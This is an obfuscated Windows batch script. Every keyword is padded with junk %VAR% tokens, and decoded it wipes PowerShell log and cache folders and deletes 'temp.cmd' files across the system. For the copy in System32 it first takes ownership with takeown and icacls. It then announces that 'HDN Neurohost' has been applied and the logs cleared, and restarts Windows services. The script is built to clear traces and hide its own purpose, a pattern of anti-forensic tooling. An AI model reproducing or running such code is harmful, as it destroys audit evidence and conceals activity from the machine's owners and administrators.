%RCKt%2%utDhSFveom%>%PDast%&%NU%1%pEF%

:: PowerShell Local Logs
:%QPyNpdNLL%:%eQsetfxO% %IafoPnYDo%P%JUXvnvxLyD%o%MZiyCcWLBv%w%gLuxtbKt%e%TcC%r%KNEMEiVIX%S%CNDGaDpxt%h%xACVIwVdjD%e%OdDYwP%l%y%l%TOAv% %HlILYbag%L%BNdLlfT%o%HUkjhmC%c%VDJHInLCZ%a%LkomOD%l%dEYrhcJY% %Hf%L%aZQCYpJ%o%PdLXhTbNr%g%YVzQExw%s%NnQwQGJA%
d%ynm%e%CgBOsfNXAS%l%PACwLxuZr% %YOH%/%mLPFxTnh%s%Rx% %U%/%Qw%f%ZGiQei% %WBrsnsulIa%/%g%q%cIctV% %mocAozAcm%"%QBmcwYoY%%LocalAppData%\%QFBVSQ%M%QYtDZwKvDU%i%CpjC%c%ifTqkKXH%r%gyhjHDWDs%o%psBswpfK%s%bWIVF%o%gDfiyhWLv%f%RfHK%t%hLFA%\%uJ%W%JmAHZmhUH%i%wUCmIl%n%tEzRY%d%doyxeLvjFI%o%MLbFlsiVbZ%w%OnhHjz%s%CcHpsKZkDZ%\%BqVgE%P%xWxWBHPo%o%rZe%w%Ddbv%e%Fcw%r%HuDeaKe%S%ETSnkkb%h%Apg%e%pYJj%l%rBQL%l%NEYw%\%bixW%*%GV%"%JdnL% %UCTNtbm%>%z%n%He%u%snUeMfwKL%l%xwXezsR% %uGXKcCm%2%UgaR%>%SsJrCRMshs%&%kszrIgKCk%1%SvGm%

:: PowerShell ProgramData Logs
:%MZRKCB%:%ARGqwHA% %LehBCHb%P%jqBDeHrFTr%o%Qj%w%MAMxoqMw%e%aVcGam%r%BZecV%S%puRJS%h%OvnFmr%e%nlDL%l%YKBoxULij%l%FTvH% %YiObgF%P%ZvEBKBKdsa%r%Wy%o%aJpZZUuVzQ%g%IXWiHrV%r%hCMtsYslk%a%myEmOcxYVE%m%ElHkxvUQ%D%qaw%a%pqFWaZNH%t%JjKn%a%rssALvA% %KW%L%EMF%o%lpKAefkDW%g%tVWmMxDs%s%BESwMwYo%
d%RPkArVtozo%e%AORb%l%a% %o%/%KnCJ%s%SHxsKP% %yibQGkKJbV%/%rPGiJfMq%f%cRqZHvj% %lH%/%gkZKMfdM%q%wXmAcWz% %KZKiCUFkn%"%axtq%%ProgramData%\%gNvLfTvt%M%EKb%i%SXBjhLLsT%c%HpgqOBKY%r%VXsqcMcJ%o%KoG%s%Qy%o%FVcQw%f%lgFLNY%t%amJHlSV%\%MSIeP%W%xT%i%DFgLWtM%n%ratdvagsG%d%aUoWZvgfYK%o%jVO%w%cIdakmeB%s%VdDHFG%\%ZsX%P%D%o%Fb%w%gYSJU%e%Vn%r%Yyjcf%S%krRKkUrK%h%PSrMxLO%e%GbL%l%lhQBNXOe%l%yCHohUr%\%dbYnbkilf%*%Cw%"%nsgA% %d%>%nKadGIGBqh%n%spT%u%pPGChqkRd%l%DoXGIL% %hfeSxTtO%2%UKxVpFcszR%>%iejpUfjfjn%&%HjFMQEhMxN%1%HvIxeXu%

:: Roaming PowerShell Cache
:%kEK%:%J% %DIrjhBnePP%R%VXaXCF%o%dxFHHjutL%a%a%m%BzTXsGC%i%qSxlVMpKm%n%AaB%g%zbGks% %ctTe%P%eTOURxD%o%AOdcf%w%mZHmnknXDx%e%Paza%r%fDk%S%VX%h%YFVXPe%e%jRGTgw%l%dSX%l%ygK% %fmwNv%C%zPQdrWJCD%a%qlaDF%c%EubVdo%h%LGElmydHz%e%jTy%
d%faeQ%e%DCimwjGQ%l%rdSJUvaalM% %AJAToKP%/%ElZKQc%s%EDnp% %mce%/%tdBDpnn%f%iTnEMm% %orvmeAubrV%/%HNUfhffUxe%q%vHToPNoM% %ZPwjovv%"%gzFoxhi%%AppData%\%NjGzfamNv%M%Jgdx%i%LVzH%c%MTlJv%r%BMr%o%MAXdBeOqw%s%vv%o%YQReWABNb%f%j%t%nmsGmNildg%\%eheoqMepB%W%abD%i%PdqfOBEpr%n%k%d%CuiDc%o%JfjQYPwCf%w%E%s%X%\%iPqztgTL%P%JgHuvMV%o%CoDF%w%LJAJo%e%lFSxWd%r%iRXxmaISo%S%UatBrJ%h%DBQt%e%yId%l%Dyr%l%YX%\%IQC%*%uVJqFhB%"%z% %iVaC%>%vUr%n%dBETu%u%XwyeeKUBGR%l%ZmVapCkWo% %uXkU%2%dRacJQYJRr%>%ZSjRG%&%OtBSxJUZ%1%qdcFQRju%

e%nTRst%c%cOgsjig%h%aecFt%o%qngZRinft% %zbJM%P%an%o%slOOXIr%w%CpnrDiTU%e%VMCrJCC%r%JcH%S%G%h%jblppGlV%e%DWxnp%l%XKvrci%l%z% %hUGhYm%L%xdJABN%o%WYO%g%PczcVF%s%wglRYg% %UDrIya%R%lrGB%e%tverwKv%m%erBnaMU%o%GaarmrEa%v%Talqmtaq%e%kJTpSIcAdw%d%asWDcNoZx% %kcUI%S%j%u%hJtzML%c%FdmzUjO%c%iK%e%GtA%s%Pkcs%s%ngEGNk%f%l%u%Ny%l%iMtIOauPQ%l%VV%y%QPWzzDXT%!%bpCLq%

:: ================================
:%kUXGfWHe%:%Ul% %glF%=%BfjC%=%BX%=%GcDkrzdyO%=%G%=%M%=%qC%=%xQwEmTYrOL%=%IBtjYJQHGC%=%SrkvQ%=%o%=%ARZDYvwGQe%=%my%=%wQQQMamnc%=%V%=%ymHi%=%rrfIgv%=%wKZADeWfU%=%OK%=%jvWbg%=%o%=%cgyH%=%B%=%kK%=%odzXzMnlj%=%KNOyPXA%=%chER%=%JqaLq%=%wqbtbQivll%=%SJsHvdIcss%=%MxIjJN%=%ZN%=%VKimMj%
:: Remove temp.cmd from C drive (robust logic)
:%RlE%:%kcWpnLSk% %FOpFGoLmF%R%DRxebNwndv%e%ndgWNd%m%ROxCGcEQ%o%ZrwM%v%NoID%e%jFZkGhkAbC% %rZ%t%YejeIyAVu%e%Sv%m%dH%p%LK%.%N%c%zO%m%PMiAwamC%d%VNBStLTLyQ% %m%f%Kxbe%r%vhy%o%xkLrIwj%m%rWSBLP% %LG%C%Vq% %XzeRk%d%jZ%r%eN%i%rIoBn%v%IKPQqHdNH%e%MviU% %Cpq%(%tbGFjlR%r%hFfuVGSCU%o%lLbRCZ%b%hViHJI%u%aufeGZI%s%fGtDeNA%t%UIrvheEL% %ZiF%l%WxLiDeRYK%o%Agtxnk%g%GNGnibK%i%XoYYPUZ%c%OduDX%)%HdfeACIJ%
:: ================================
:%B%:%FmanbeJC% %NvHaKzcUPH%=%WZaLu%=%RJKBE%=%V%=%Rybulnk%=%stxrnZTag%=%BDK%=%xCubIT%=%YHYukA%=%DHqVhHN%=%LBlXz%=%ZLs%=%M%=%PykWuQg%=%Hm%=%dlVEla%=%PJN%=%MiyOVke%=%KplD%=%mNH%=%bbmDWlSryL%=%SSrYs%=%ZvqM%=%qnfwzNze%=%Vc%=%fZfknMxDg%=%aRc%=%oYmqieVQ%=%VvR%=%JS%=%bMvodoucRQ%=%aD%=%eYw%
e%KzXaWgy%c%jQ%h%yIArhxmRJq%o%aiH% %CC%R%B%e%vf%m%rLIEmUvi%o%JgBESKLz%v%hurLZybrgJ%i%LTxyWptL%n%QA%g%nAXWSRHr% %XMFkPBsXy%t%SkteTho%e%WjDy%m%FPiIhxSOz%p%JnJLQLwDw%.%ugRGx%c%JtSS%m%nswbqhyIA%d%cbJYcoy% %qLF%f%TQxFYKEY%r%TciCp%o%hRCGBmFM%m%rmN% %Bt%C%PTd% %nTwvTefFUk%d%nPbvYlSiz%r%Pu%i%PNYAqFQGH%v%YvI%e%vOmNpHnPR%.%bbKiV%.%RtlKji%.%ntz%
s%uYR%e%lCoI%t%SeCJ% %lqovf%"%wltgdhXJi%t%TZHQ%e%bVLRCTm%m%UYZ%p%xtVrNmIrL%_%JVCOBdOuwz%c%yFWh%m%mRBYRah%d%G%_%KzGr%r%lO%e%uCZ%m%NYfFJmLyBc%o%aLaKXIP%v%o%e%qzrhdFkVv%d%rjdtHAEJB%=%kMNyIMBcx%0%BOfu%"%qpSUS%

:: 1) Known paths - each checked individually (space-safe)
:%snF%:%RhXECX% %HHrcTxpvML%1%uZgw%)%grGphICM% %FuKoXncCB%K%HIRBehfiiT%n%NKigxHYZpf%o%p%w%ZIezj%n%WCGAFGCf% %wIpAp%p%zHCPkfrWaU%a%gIV%t%WIvKUP%h%MMBzrlGY%s%fsQOBIds% %jMtjvrGcf%-%b% %TIdFHlrjY%e%tCEQgh%a%WzUfAsrNQ%c%TSPbfzl%h%xgZBfE% %GeN%c%iL%h%Cr%e%Iw%c%OQCSGlJmbm%k%TxUoBQThzJ%e%cLdJN%d%SCrPzVFv% %pVaMGOI%i%jyYe%n%TEV%d%Ux%i%dSNHIRIE%v%JqzKDOX%i%Je%d%PUucja%u%tlPCZX%a%XtB%l%NkPA%l%Cbory%y%UIIPfJJNNK% %v%(%rl%s%hLT%p%LrLfsu%a%KAQUE%c%aFv%e%WtlMm%-%VnItjxdsxa%s%vlJaKr%a%kcueU%f%oAmTp%e%fQXyeQ%)%dVsLLMTFx%
call :DelTempCmd "C:\temp.cmd"
c%guUOMM%a%hDZBplqM%l%NtASS%l%ZsZwBS% %KfNVOg%:%TJpBFieTgp%D%Vl%e%GNrGAQfnB%l%JaW%T%Uagh%e%CuRhfIZLjv%m%i%p%KeICWyGdF%C%bGcQ%m%Z%d%hZ% %BjWkTmb%"%GBmkdNg%C%nZKvgel%:%OArFaLQu%\%OVhsT%t%OOzNmmEpi%e%SlgWELeIN%m%XjDx%p%FOllAxYk%.%LCczLvdrG%c%PjZjWssPL%m%vpytjR%d%jTCUvTTcE%"%b%
call :DelTempCmd "%UserProfile%\temp.cmd"
c%Ojstj%a%rbzsCT%l%KChKj%l%YjF% %DXYpPOtukv%:%e%D%nmiVkn%e%VThQ%l%fsq%T%LjdytloUtO%e%zVDvXhFSoN%m%ZFjm%p%xRRdlVo%C%vbGVNE%m%eFZV%d%nJKJta% %YkzHJfpH%"%EebF%%UserProfile%\%eT%t%VxwXq%e%dmcMcBR%m%Q%p%ly%.%vTUdAGVvy%c%GfOeG%m%B%d%aSdleWBck%"%JE%
call :DelTempCmd "%UserProfile%\Desktop\temp.cmd"
c%vlRiHDPc%a%QOU%l%nCOb%l%XkSOjbK% %jlTanSmST%:%mAbBGFASW%D%TtwCwQKJ%e%L%l%mpahKAp%T%WYUOBddRag%e%JFWxDz%m%Xlcm%p%o%C%UGmiLaPeg%m%Cmfc%d%xo% %IwVmL%"%UBemDwCxwQ%%UserProfile%\%wMXtk%D%vqogijR%e%MpvsV%s%m%k%cHkedKw%t%X%o%qCcXafv%p%uL%\%pvXmCiCRqg%t%soJbHJL%e%ZdsfsyPeQA%m%JfesV%p%kYmWbUSlx%.%Yz%c%SYA%m%v%d%rpY%"%IVJbnkU%
call :DelTempCmd "%SystemRoot%\temp.cmd"
c%QhVpOYeC%a%LxpvTDCoJ%l%lgkapwsc%l%ZoG% %hQD%:%xxXRjmpZ%D%bY%e%uGnVuJTxTt%l%rZNsN%T%t%e%lfrxlLRS%m%yAM%p%EOiBoAFs%C%J%m%koOuWPTTF%d%GJk% %M%"%iGys%%SystemRoot%\%BhA%t%fyMu%e%DpPbq%m%JMG%p%kvIuqgM%.%rKBYmPJqxf%c%jEAtizoyGX%m%aOk%d%SMg%"%pNS%
call :DelTempCmd "%WinDir%\Temp\temp.cmd"
c%f%a%ol%l%U%l%vMw% %pHLndWEI%:%PmfaVgv%D%s%e%Y%l%TdeG%T%WWIl%e%KKHQejgDcM%m%fblPjWDm%p%j%C%aXihlvWZIm%m%pxlVmH%d%DMFd% %xSL%"%ma%%WinDir%\%NaCjDIJH%T%TxSd%e%y%m%ct%p%HEQvq%\%Hm%t%Xa%e%evIPF%m%ABFdNRM%p%UWeKPmvHO%.%EKEDMCVtG%c%LFVe%m%mZqLfobI%d%jsEAh%"%KhmbKDlt%
call :DelTempCmd "%TEMP%\temp.cmd"
c%GEuEkkkzne%a%CSXxwj%l%Qc%l%lBzstdsuo% %EI%:%Eyfcg%D%nm%e%ClnwGj%l%h%T%vLhxQY%e%pP%m%QLGJC%p%lkOufg%C%AoLweDBI%m%KznuWuPk%d%iYktBKqNZ% %zmKD%"%dJt%%TEMP%\%tTQDytOkID%t%VvbEFCqh%e%zkrgqSqtUA%m%nmyLyE%p%WkRywtUF%.%tmDK%c%LNUIbCZWm%m%yoCZuA%d%ti%"%fKKl%
call :DelTempCmd "%LocalAppData%\Temp\temp.cmd"
c%jGrqLG%a%eqAvuHUz%l%cHaXbrWK%l%h% %qpFLCbmWyJ%:%XVkmOQzgaA%D%rGLDoBo%e%Rfqcghg%l%ee%T%ol%e%dnYatS%m%aiGT%p%khRR%C%NGA%m%mzQSdO%d%kEdU% %FBsCG%"%oABogI%%LocalAppData%\%hpgwtWv%T%vwE%e%me%m%OxVaFUPUaB%p%ZDwms%\%b%t%u%e%iD%m%CuqrzpF%p%yO%.%dOZLUO%c%YweLnkU%m%vOgUSky%d%HPkcUVRH%"%ouMD%
call :DelTempCmd "%AppData%\temp.cmd"
c%YJRYB%a%aPM%l%IvKlLFtfqZ%l%aO% %oniwqmh%:%jldhoUtTjN%D%IXbinC%e%jIOHOmgX%l%kCsRIqVp%T%N%e%n%m%lTyyNSLux%p%opZGcOKH%C%EPi%m%a%d%Gmj% %WaqBjqscCh%"%GQqxbivokA%%AppData%\%IowTx%t%Zdjnqv%e%bu%m%A%p%U%.%niYZuf%c%yqnFFb%m%koRKivcwi%d%z%"%EYLSkuDVw%

:: 2) System32 - take ownership then delete (admin required)
:%B%:%UloSwxURJZ% %FCDxx%2%TaPpFWU%)%dRsa% %nHTWwgL%S%ZJhsLWkLjv%y%w%s%yTdsEs%t%bGCnYgU%e%vv%m%H%3%Qs%2%EqI% %ukRnXIMf%-%qQS% %hcwyOI%t%tuo%a%zRwxsbCw%k%JpVHRaGj%e%uswOupABSH% %oREbQ%o%yhZ%w%ZooMLuUKV%n%SjDWE%e%pWA%r%HjF%s%rFbDo%h%arF%i%OcN%p%Bd% %Jd%t%NgJrBYgsf%h%bnAbzf%e%mQ%n%DHLXupXvTG% %TbuQioAyKP%d%WqGTnjLuVi%e%ZDchkF%l%eRlXcFsO%e%A%t%TajtxMDCwA%e%lDnRBKi% %RCzwkNsU%(%wiZlic%a%MwCFXTcPmV%d%wgzkPNOjx%m%X%i%FSnbYD%n%wWoac% %ULCjFdrWa%r%Afta%e%W%q%LVcJVhauuz%u%oOxVcCsVst%i%oPxzvSQ%r%qkEQLWX%e%hRLJJN%d%TicvmNAvgk%)%aYJAD%
i%sGQbzZ%f%J% %xvThIq%e%nKliuMjRxL%x%lBEpxX%i%zXdpGOVG%s%HqL%t%xBPllxWo% %P%"%cDlx%%SystemRoot%\%aYgRJtzx%S%ESZTPQ%y%BylJvWJQ%s%AIlxWbgJ%t%RVaI%e%TBmJfVfPQj%m%VeWpywAcNJ%3%KQztStKI%2%vLEDYniPq%\%uHrBqMWVlI%t%JQ%e%fl%m%Gc%p%rXEbOxfrd%.%DGeE%c%POGKgZlG%m%mZYHMQsVbY%d%zsUrargmfS%"%n% %XajAu%(%ZOWEHr%
 %CcBLOE% %D% %dOqkrHUMd% %mLjQjTpW%t%jqcsCEk%a%fBnfA%k%QmqWrpQnrQ%e%BoLFMUkVSS%o%vQqlDCMp%w%xjd%n%enbkNp% %qfDDNTn%/%NxJl%f%WjyMG% %u%"%gbVUj%%SystemRoot%\%jkNPPrT%S%HvdHG%y%sVdp%s%EFujlftI%t%upRuudRUMJ%e%WXtHlqkPIN%m%FYZ%3%KCzaxgM%2%BiTBTemhoN%\%wyLni%t%T%e%EWLApkrdR%m%qYKnVEDBw%p%YJ%.%kmb%c%vzb%m%dpO%d%xMDXwFGURu%"%m% %SqYI%>%Fd%n%r%u%qM%l%OQTcDtOPUa% %fCk%2%ic%>%fdL%&%m%1%NrSVxKYgpt%
    icacls "%SystemRoot%\System32\temp.cmd" /grant Administrators:F >nul 2>&1
 %A% %PGySbvCrWM% %YgDVUh% %VCGYBt%i%s%c%TZKQYeZJ%a%GKCWpqpxX%c%GQweBGY%l%aaRlsYQIIw%s%beqdA% %U%"%TfRTuj%%SystemRoot%\%JXeL%S%cLCPeTROIp%y%LJUPr%s%z%t%Sy%e%JREI%m%vukKzJjP%3%TaKgMP%2%GugsuidNwj%\%RLOGGni%t%XdYiI%e%AamIGgkoqp%m%WyOBlnfov%p%Vr%.%OovyHdfUmQ%c%rMn%m%rXvkudsAv%d%Ehp%"%j% %rtgWDPm%/%c%g%yADq%r%LAYSW%a%Ou%n%XgrIPkgloi%t%ntQ% %z%A%svraglg%d%lOakhxa%m%QK%i%G%n%jClhsb%i%b%s%qTi%t%hUmTw%r%KzrFuLUnaz%a%HVtxzJCy%t%sV%o%rBeRkVGTU%r%BBweiZwCje%s%SwqeThyPh%:%hgBXp%F%ee% %BFZ%>%dlsyV%n%jofYsbni%u%ujjUFXALn%l%Zg% %XBHos%2%m%>%HktqmVV%&%VbTse%1%quTusbG%
 %mhZqMrVsw% %ACU% %zT% %fJ%d%TB%e%tQxCNIqW%l%rWWhNibE% %YdoOcLxxr%/%Wdxlf%f%TAHSU% %clxdnmAs%/%KyLaCwoKQ%q%ADfGrLLoK% %DdcCAUJX%"%Ki%%SystemRoot%\%SZpAV%S%YMH%y%ankYTuo%s%kP%t%BgfnVap%e%msNAhygkV%m%WLJmXS%3%tkEGdjxKg%2%ABs%\%KFz%t%qO%e%OsKOB%m%whmPGq%p%Na%.%HaTFlgqLr%c%fbeCE%m%ipuJgP%d%SCCoJ%"%RBKKvbOb% %CUmKzfdwv%>%crklrjoWR%n%xN%u%orKo%l%QyXPl% %DTioCRkXfz%2%GLiklC%>%hNd%&%joSUGk%1%Wsv%
    if not exist "%SystemRoot%\System32\temp.cmd" (echo   Removed: %SystemRoot%\System32\temp.cmd & set /a temp_cmd_removed+=1)
 %kTXa% %KMKgywhWH% %iseoicIJ% %rXeQOO%i%EAwAROanZ%f%BziJNCaGbG% %jqen%n%qSo%o%K%t%q% %OgRuIGfsI%e%uqvndyMlMa%x%haToAZCj%i%hNVGiSjZZ%s%GjOLZOdLtD%t%RoUrTAT% %JMdpZQ%"%czv%%SystemRoot%\%yW%S%jILPrnOn%y%CNbriYIqm%s%HYVkGd%t%hLbrq%e%aCjpF%m%MvrRNw%3%dGUxdHoD%2%pVr%\%rD%t%Grw%e%OO%m%dd%p%ODCGmB%.%ckawqKMN%c%c%m%hTK%d%pu%"%f% %GRlQopmwtt%(%rECW%e%ay%c%sVIGlXsRbm%h%dcaf%o%MPtqJGTL% %acFNaPpgid% %FpGNOj% %mn%R%TCOuEeBIEK%e%EAne%m%x%o%bXDkPZiN%v%cqGZpp%e%KvZRn%d%W%:%dQQVcO% %iZ%%SystemRoot%\%JLwxmb%S%XyaizB%y%Tqz%s%h%t%TB%e%Bn%m%XlCN%3%uoXEpGcO%2%SxyIFdoHV%\%EvkUv%t%GtSlQ%e%QoSjE%m%LSmnnDtLvb%p%mbS%.%CPVq%c%GnpsrE%m%PpvIRkWxEY%d%mAmiW% %RDyejBqgNZ%&%eNVQEk% %PAmJnPhaoW%s%tjQpFBGlkQ%e%Y%t%M% %D%/%CZPLJL%a%gXHuhql% %ikVdh%t%Q%e%qROLewfqLi%m%tjq%p%R%_%sQlbftckJw%c%erzAKwQLKU%m%v%d%SnoWbzJuRW%_%WyzP%r%r%e%mcORtMre%m%MSCFLNAr%o%zHxGe%v%elNQAlM%e%N%d%PZuxJBQ%+%frdoI%=%Ux%1%tUaMHh%)%czvl%
)%MMnyb%

:: 3) Search under C:\Windows only (faster than full C:) for any remaining temp.cmd
:%OQCgXs%:%efSHpAVe% %gVBaiPErNA%3%EvtOtL%)%ul% %yvnsh%S%dMWFFV%e%QOkcouByY%a%eiNjZm%r%T%c%Fu%h%dIidbk% %iG%u%u%n%pGZHDEs%d%DdJCWxUlGM%e%qesxaaIf%r%oKhhmY% %GetyLDhhg%C%pzKHLTRem%:%IhwZqf%\%hoNaAIPBAo%W%zJL%i%OHqmfwL%n%G%d%UhiFIHDlTx%o%eaSdS%w%iKyEQPOLul%s%BJdOwosGCB% %eFbgXR%o%n%n%xmvgc%l%rczh%y%bMN% %IZ%(%ZYNjVy%f%nYbKRjM%a%n%s%QoOQuLyKSP%t%U%e%H%r%JgBIwnkp% %grMwsV%t%Tme%h%hpIztOvTI%a%QlP%n%DUGjf% %zL%f%shW%u%CYzUEuue%l%FLnzkdtD%l%wEkY% %KGDkoKW%C%exuIANTd%:%VlmRnEyuyl%)%pMwVxBsZK% %W%f%XLpVkKabsO%o%vP%r%Hlkhl% %VNMQMPp%a%SgIDWTJj%n%R%y%xC% %kytQI%r%gro%e%PITSyUG%m%cS%a%w%i%NQqBEWcVQL%n%qf%i%JWxxPtGICu%n%ZRtd%g%JaFQLek% %tRONghaBN%t%clK%e%HlZHgcs%m%oHjmIHfs%p%DcGlgg%.%NFB%c%YH%m%lPzZLPGOED%d%ptR%
f%PkFkotkWga%o%qHq%r%HucF% %dPawNyQci%/%WQNMStHMr%r%xGOm% %P%"%J%%SystemRoot%"%FlEw% %PjxnGZYO%%%a%oYWPzjh% %AkP%i%GFdWYBkn%n%PYaMECvkj% %tR%(%cCbzf%t%ruKLWGDXuS%e%hkHp%m%RmGIT%p%bE%.%dcVuv%c%mWK%m%b%d%OWbWZik%)%tuWyCzLrkN% %OoaUdYlhK%d%KnVw%o%Pibdljtg% %lxklwU%(%cMr%
 %p% %NmRpu% %DkUvIRke% %fIpOHvim%i%aUcyCh%f%ZxTApHBtz% %KGeTsrTgW%e%hnjVj%x%OLnuUC%i%YpMPVbpOcq%s%th%t%nSuShymF% %lleXGI%"%tMP%%%a%cRPKoRcC%"%zticFfZvlT% %FJMlDIkVlz%(%j%
 %eGUjDzUcjV% %IFpZzazkO% %tQchzZOw% %fMsSsBdY% %NkNgHoFdI% %jIOFClEyJn% %wRPZU% %lquxyTxQ%t%KG%a%GHgJkRW%k%t%e%Hs%o%fGnvz%w%JzwhqnRfb%n%fpC% %c%/%pucBkg%f%dfxjKDd% %AShgrYDMnA%"%h%%%a%TEWjsPctIT%"%kJfcDvvS% %G%>%Gd%n%qZKVthnZ%u%ZueErqp%l%ItQHmhP% %sBccAWLNqA%2%TTxAxg%>%zEbIqb%&%Rrs%1%h%
        icacls "%%a" /grant Administrators:F >nul 2>&1
 %coYtaLUHVA% %dwiEaN% %ihAIubKC% %sif% %OLWFDNk% %nGyQGJaLOO% %tfBKdUHfu% %sU%i%HNKIvkGwrw%c%JwlRBe%a%ORozUDZ%c%eqGbKFj%l%DCGpVUabol%s%bcrNKudJy% %YTiWs%"%KGPpXW%%%a%apPP%"%PU% %BjO%/%F%g%gydCktMpki%r%nej%a%N%n%KqxPZnb%t%DKiMcjVf% %Vl%A%px%d%vxgu%m%RBlJoInyv%i%OLurr%n%vfba%i%wtQ%s%usbRDWR%t%GSXPl%r%w%a%cBhKmc%t%gMwvyMF%o%bc%r%RxToU%s%j%:%SpWfhGHeN%F%Wa% %RercRNOLs%>%ZDgNp%n%qVGOAX%u%QHL%l%s% %YVkighFUo%2%KtTnbUdU%>%jbiXPT%&%TLkGE%1%bu%
 %cwgOsyXCn% %QvpSOAzBSY% %y% %gBPHtIjSE% %fdcw% %YqHbRIx% %tso% %ACVurvPHHB%d%XjEFT%e%gMmUeyP%l%vDneFtQ% %pXf%/%CZP%f%BZeKg% %d%/%PePGtd%q%AyYplyQ% %qRMdpCzjUY%"%khzIvp%%%a%DLK%"%DACsR% %DwB%>%iwax%n%dOTXyjZMs%u%yLfA%l%zmZKiEq% %MePLHhat%2%dVdFRtVa%>%wP%&%xeZCUBXqrG%1%VU%
        if not exist "%%a" (echo   Removed: %%a & set /a temp_cmd_removed+=1)
 %GaJQOvFd% %cvfMUvjpGo% %hRRLnqZZSr% %GPbDt% %hb% %tAZnL% %FNeHZItTF% %njiKCfndl%i%MLWVs%f%OS% %dw%n%c%o%g%t%iJP% %kdNAf%e%LsJjdo%x%sjVxrKKgD%i%LWjuQ%s%xfSgNEP%t%Sm% %wwODVwZ%"%kcBLP%%%a%xA%"%Se% %GR%(%Pat%e%LSZGA%c%FXKdpm%h%isNkvkQ%o%EhWYExcp% %JjFgQy% %H% %Or%R%FhIgJNOnfW%e%Evczq%m%vxB%o%gkwLZx%v%FExeJfZAvG%e%FEZvkkSu%d%gVIUQO%:%t% %EpclmROa%%%a%NxbzEZqT% %cGR%&%SdWSVveyA% %yVcipc%s%iJRo%e%klYnhLdY%t%IFqlO% %LWH%/%LmldeRgwwA%a%nHcWLsZfa% %YM%t%uSOA%e%wCV%m%BG%p%CLxzFD%_%cMmumBT%c%uAxYOe%m%ZDqQVfgmVy%d%HTqKrlvABA%_%oCcVNtXY%r%RTOX%e%ue%m%KRcBYNdG%o%O%v%kRoJKGO%e%NC%d%vSyWBvlF%+%tdRwXCCsy%=%doqqTfU%1%eB%)%Wg%
 %SagJgmGFjK% %bJB% %zwdiaEst% %CNscaq%)%Bnw%
)%LiONld%

i%PCyQsKLOm%f%ntqP% %QYOrajnO%!%eLl%t%wkvsymz%e%Gmjsr%m%tqoMe%p%tHO%_%iY%c%w%m%uP%d%ay%_%aV%r%uFyUf%e%yqYXTbxSns%m%dPAMjHq%o%IImSyLDpm%v%CHE%e%erNYtql%d%vTeOEvX%!%OTwq% %wFYDzhDt%g%eNl%t%htCOZkl%r%zH% %gyBEqGErXn%0%AUG% %RFUbxgof%(%MRDX%e%e%c%hHmR%h%SKYzivH%o%bzX% %GiLwdnNp%t%iFbgE%e%lDMJoZUcnf%m%tffYmzcIq%p%Hyu%.%Ut%c%YpbS%m%hGxUpeSJP%d%aJbMkCTGC% %BkU%r%qftwmQp%e%ho%m%Db%o%aU%v%AFf%a%VdFRZ%l%y% %fXrtuyWiR%d%jYzSlA%o%DDRYaNG%n%AqPxlWxaz%e%Z%.%EudkUOkG%)%UYxT% %vdW%e%twtnc%l%A%s%puTel%e%JDJPmPW% %M%(%ywvph%e%CIVKL%c%dWcj%h%sKvJ%o%DqEtkmusZv% %Vs%N%c%o%zIcCULOU% %gEZ%t%xcD%e%KjuqertJ%m%u%p%fdhaw%.%PUeCXtl%c%RLlY%m%jZaGa%d%wEAUno% %Ah%f%IqNrDbYK%o%IPBpmKt%u%kikviWjk%n%Lg%d%jxEhJXbBB% %LjRP%o%kLml%n%ZC% %Vy%C%Ce% %LKkg%d%kWMH%r%C%i%QJ%v%REpwFObW%e%UUVxVFy%.%pDoMhwAQ%)%iFUa%
e%QmmSbt%c%n%h%LfW%o%gBFbXepV%.%NiHE%

e%oJlEQ%c%rIgtKZ%h%YBAkFIUjSd%o%sdKCIkpE% %Z%D%tUnun%o%P%n%HZJ%e%RRbzx%!%kKeNfm% %Jauynrr%H%fEEAN%D%jlAqJGZV%N%wbXOOoGGt% %BYkWebj%N%aLFynYvXwY%e%qHjqvCoRLs%u%PU%r%gaIj%o%XZOiRzW%h%AKmVNcMa%o%iliOVBcnu%s%LrmHs%t%vha% %eIosqKp%h%UUhvxq%a%jAKLV%s%isBga% %iPFtrYna%b%czFluRr%e%So%e%zvurcjz%n%aoPfes% %kWpGvZnI%s%pS%u%x%c%z%c%j%e%urwUeu%s%bZIM%s%rPGGqOh%f%K%u%zyxAMeGOy%l%UmntFkSm%l%YWPFmpZPlp%y%lHOAm% %eHMmLEMnt%a%aCjGIUyqYZ%p%rlT%p%gxCgDbD%l%i%i%k%e%paKcXSk%d%KuH% %t%a%JcOnSJO%n%ZEEGJa%d%CO% %KOokbNLY%l%tiSdX%o%sWB%g%HljJ%s%v% %SWVs%c%D%l%pJGpK%e%RVXg%a%RwjbTg%r%CYIOxMaD%e%KmlIhi%d%BBxTGo%.%klWnC%
p%neA%a%O%u%dfHWOzJ%s%SIvlAa%e%sjQ%
g%qmNDYAkE%o%uzgZmgWsc%t%z%o%zdamYjf% %gjQ%m%J%e%KTADEZFM%n%mQDfhCTq%u%Qhj%

:: Restart stopped services
:%VynipMyK%:%RqPvMC% %TL%R%aSsaLuTCP%e%g%s%qsuqyDUr%t%xOP%a%L%r%sgdNZIpU%t%pmiPlNk% %mDfqE%s%o%t%BFYb%o%fB%p%ImI%p%XnT%e%tOEaeOnB%d%Y% %mKW%s%BVqrtOu%e%LMSGmx%r%MVQWCXUAJi%v%GWkaS%i%CYm%c%fhGuVwXDT%e%gZJ%s%eUvSbgxD%
n%xSl%e%LRhsQiMy%t%s% %rkI%s%Ybi%t%LRvnoL%a%jeGso%r%NxSKcyvv%t%Irgwnfc% %vaEy%w%XV%u%IFbkctGc%a%zyR%u%iA%s%pQqMfVFz%e%Wdukx%r%CR%v%pRSErin% %qsghv%>%C%n%xfW%u%GXQIP%l%AdBNkpJZEx% %eXbheER%2%OzDi%>%nuRks%&%H%1%iYhB%
n%LJQwJ%e%QodkN%t%ffZRTk% %ZdfGc%s%jNWarm%t%ELq%a%pvw%r%Sc%t%Jqb% %xl%t%h%r%kXoBnzzlms%u%CmjEFKFP%s%EmraEkHBsg%t%KX%e%OJ%d%VI%i%yMoNDYDy%n%WWNQn%s%GEkLFQiLz%t%synOqpd%a%pfTEhT%l%NEyTJ%l%WpwOoUASJc%e%EtyQSZvaE%r%s% %ywHPdlkIZV%>%KEJ%n%LWSbvdC%u%nog%l%oWmSLHKLzT% %JtnYJ%2%nl%>%Mxltvp%&%NlvbdyrXv%1%DFDsWjvcVF%

:DelTempCmd
:%CtD%D%eM%e%dhblKd%l%Rhn%T%S%e%fraF%m%EeemQqmFa%p%lcjJ%C%dfmR%m%QLXTcO%d%EDT%
